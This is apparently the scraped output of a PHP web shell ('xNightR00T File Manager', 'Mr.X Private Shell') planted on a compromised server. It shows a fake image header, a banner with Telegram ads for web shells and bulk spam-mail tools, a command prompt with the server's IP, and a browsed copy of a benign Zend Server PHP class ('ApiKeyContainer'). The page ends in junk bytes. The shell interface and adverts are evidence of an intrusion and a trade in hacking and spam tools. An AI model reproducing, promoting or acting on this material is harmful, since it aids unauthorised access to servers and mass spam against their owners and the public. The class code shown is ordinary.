xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<?php

namespace WebAPI\Db;

use ZendServer\Log\Log;

class ApiKeyContainer
{
    /**
     * @var array
     */
    protected $apiKeyData = array();

    /**
     * @param array $apiKeyData
     */
    public function __construct(array $apiKeyData)
    {
        if (!$apiKeyData) {
            $this->setId(0);
            $this->setName('');
            $this->setHash('');
            $this->setUsername('');
            $this->setCreationTime(0);
            return;
        }

        $this->setId($apiKeyData['ID']);
        $this->setName($apiKeyData['NAME']);
        $this->setHash($apiKeyData['HASH']);
        $this->setUsername($apiKeyData['USERNAME']);
        $this->setCreationTime($apiKeyData['CREATION_TIME']);
    }

    public function toArray()
    {
        return $this->apiKeyData;
    }

    /**
     * @return the $id
     */
    public function getId()
    {
        return $this->apiKeyData['id'];
    }

    /**
     * @param number $id
     */
    public function setId($id)
    {
        $this->apiKeyData['id'] = $id;
    }

    /**
     * @return the $name
     */
    public function getName()
    {
        return $this->apiKeyData['name'];
    }

    /**
     * @param string $name
     */
    protected function setName($name)
    {
        $this->apiKeyData['name'] = $name;
    }

    /**
     * @return the $hash
     */
    public function getHash()
    {
        return $this->apiKeyData['hash'];
    }

    /**
     * @param string $hash
     */
    protected function setHash($hash)
    {
        $this->apiKeyData['hash'] = $hash;
    }

    /**
     * @return the $role
     */
    public function getUsername()
    {
        return $this->apiKeyData['username'];
    }

    /**
     * @param string $role
     */
    protected function setUsername($username)
    {
        $this->apiKeyData['username'] = $username;
    }

    /**
     * @return the $creationTime
     */
    public function getCreationTime()
    {
        return $this->apiKeyData['creationTime'];
    }

    /**
     * @param string $creationTime
     */
    protected function setCreationTime($creationTime)
    {
        $this->apiKeyData['creationTime'] = $creationTime;
    }
}

Filemanager

Name Type Size Permission Actions
ApiKeyContainer.php File 2.14 KB 0644
Mapper.php File 3.81 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1